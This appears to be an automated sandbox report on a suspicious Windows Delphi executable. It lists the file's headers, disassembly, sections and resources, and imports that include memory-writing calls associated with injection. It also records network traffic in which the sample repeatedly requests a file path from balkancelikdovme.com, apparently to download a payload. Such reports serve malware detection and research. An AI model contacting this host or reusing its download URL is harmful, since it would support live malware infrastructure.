File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	eeb6f210c31e51d5b63be371278c03a3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 004601C4h
call 00007F6B8C4FC2CDh
mov eax, dword ptr [004EBB1Ch]
mov eax, dword ptr [eax]
call 00007F6B8C547BD5h
mov ecx, dword ptr [004EBC14h]
mov eax, dword ptr [004EBB1Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045FF04h]
call 00007F6B8C547BD5h
mov eax, dword ptr [004EBB1Ch]
mov eax, dword ptr [eax]
call 00007F6B8C547C49h
call 00007F6B8C4F9EF0h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xed000	0x232c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf9000	0xd600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf2000	0x6c0c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf1000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x5f4ac	0x5f600	False	0.5237011590760158	data	6.539693084964852	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x61000	0x8acb4	0x8ae00	False	0.6662107617011701	data	7.528235634086147	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xec000	0xd15	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xed000	0x232c	0x2400	False	0.3628472222222222	data	4.971041857999194	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xf0000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xf1000	0x18	0x200	False	0.05078125	data	0.15842690200323517	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xf2000	0x6c0c	0x6e00	False	0.6440340909090909	data	6.682368392261621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xf9000	0xd600	0xd600	False	0.1875	data	3.9582855006976745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xf9e98	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0xf9fcc	0x134	data			0.4642857142857143
RT_CURSOR	0xfa100	0x134	data			0.4805194805194805
RT_CURSOR	0xfa234	0x134	data			0.38311688311688313
RT_CURSOR	0xfa368	0x134	data			0.36038961038961037
RT_CURSOR	0xfa49c	0x134	data			0.4090909090909091
RT_CURSOR	0xfa5d0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0xfa704	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xfa8d4	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xfaab8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xfac88	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xfae58	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xfb028	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xfb1f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xfb3c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xfb598	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xfb768	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xfb938	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.5208333333333334
RT_BITMAP	0xfb9f8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.42857142857142855
RT_BITMAP	0xfbad8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.4955357142857143
RT_BITMAP	0xfbbb8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.38392857142857145
RT_BITMAP	0xfbc98	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.4947916666666667
RT_BITMAP	0xfbd58	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.484375
RT_BITMAP	0xfbe18	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.42410714285714285
RT_BITMAP	0xfbef8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.5104166666666666
RT_BITMAP	0xfbfb8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.5
RT_BITMAP	0xfc098	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_BITMAP	0xfc180	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.4895833333333333
RT_BITMAP	0xfc240	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.3794642857142857
RT_ICON	0xfc320	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.2355595667870036
RT_ICON	0xfcbc8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors			0.2805299539170507
RT_ICON	0xfd290	0x3a48	Device independent bitmap graphic, 60 x 120 x 32, image size 14880			0.052815013404825736
RT_ICON	0x100cd8	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720			0.09186390532544379
RT_ICON	0x102740	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.20081967213114754
RT_ICON	0x1030c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.3182624113475177
RT_DIALOG	0x103530	0x52	data			0.7682926829268293
RT_STRING	0x103584	0x308	data			0.43943298969072164
RT_STRING	0x10388c	0x1f0	data			0.4213709677419355
RT_STRING	0x103a7c	0x1c0	data			0.44419642857142855
RT_STRING	0x103c3c	0xdc	data			0.6
RT_STRING	0x103d18	0x2f4	data			0.4497354497354497
RT_STRING	0x10400c	0xdc	data			0.5863636363636363
RT_STRING	0x1040e8	0x10c	data			0.5746268656716418
RT_STRING	0x1041f4	0x33c	data			0.4311594202898551
RT_STRING	0x104530	0x3d4	data			0.3683673469387755
RT_STRING	0x104904	0x3a4	data			0.34763948497854075
RT_STRING	0x104ca8	0x3e8	data			0.384
RT_STRING	0x105090	0xf4	data			0.47540983606557374
RT_STRING	0x105184	0xc4	data			0.5663265306122449
RT_STRING	0x105248	0x2c0	data			0.4446022727272727
RT_STRING	0x105508	0x478	data			0.2928321678321678
RT_STRING	0x105980	0x3ac	data			0.37553191489361704
RT_STRING	0x105d2c	0x2d4	data			0.4046961325966851
RT_RCDATA	0x106000	0x10	data			1.5
RT_RCDATA	0x106010	0x368	data			0.6938073394495413
RT_RCDATA	0x106378	0x129	Delphi compiled form 'TForm1'			0.7878787878787878
RT_GROUP_CURSOR	0x1064a4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1064b8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1064cc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1064e0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1064f4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x106508	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x10651c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x106530	0x5a	data			0.8222222222222222

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	GetErrorInfo, GetActiveObject, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
ntdll	NtWriteVirtualMemory, NtProtectVirtualMemory
uRL	TelnetProtocolHandler
ntdll	NtQueryInformationFile, NtOpenFile, NtClose, NtReadFile
ntdll	RtlDosPathNameToNtPathName_U

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2023 20:15:38.651643038 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:15:38.684433937 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:15:38.684789896 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:15:38.685477972 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:15:38.717952967 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:15:38.718023062 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:15:38.758333921 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:15:48.442692995 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:15:48.475735903 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:15:48.684077024 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:15:48.715687037 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:15:48.715842962 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:15:58.453622103 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:15:58.486627102 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:15:58.526833057 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:08.409265995 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:08.442828894 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:16:08.482656956 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:18.423207998 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:18.456218004 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:16:18.496371984 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:28.441639900 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:28.474505901 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:16:28.515156984 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:38.397792101 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:38.430927038 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:16:38.473556042 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:48.403294086 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:48.652740955 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:48.954236984 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:49.239614010 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:16:49.280879974 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:58.437895060 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:16:58.471102953 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:16:58.511461020 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:08.417718887 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:08.450614929 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:17:08.491209984 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:18.414856911 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:18.450731039 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:17:18.491997957 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:28.389785051 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:28.422786951 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:17:28.462675095 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:38.405219078 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:38.438024998 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:17:38.477365017 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:48.433187962 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:48.466253042 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:17:48.507175922 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:58.413938046 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:17:58.447000980 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:17:58.487883091 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:18:08.394927979 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:18:08.428872108 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:18:08.469712973 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:18:19.080457926 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:18:19.114404917 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:18:19.154422045 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:18:28.416295052 CEST	49722	80	192.168.2.3	185.181.116.217
Aug 23, 2023 20:18:28.450485945 CEST	80	49722	185.181.116.217	192.168.2.3
Aug 23, 2023 20:18:28.490366936 CEST	49722	80	192.168.2.3	185.181.116.217

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2023 20:15:38.598284960 CEST	56452	53	192.168.2.3	8.8.8.8
Aug 23, 2023 20:15:38.636898041 CEST	53	56452	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 23, 2023 20:15:38.598284960 CEST	192.168.2.3	8.8.8.8	0x8271	Standard query (0)	balkancelikdovme.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 23, 2023 20:15:38.636898041 CEST	8.8.8.8	192.168.2.3	0x8271	No error (0)	balkancelikdovme.com		185.181.116.217	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

balkancelikdovme.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49722	185.181.116.217	80	C:\Users\user\Desktop\r096teIe1H.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 20:15:38.685477972 CEST	0	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:15:38.718023062 CEST	1	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:15:38 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:15:48.442692995 CEST	43	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
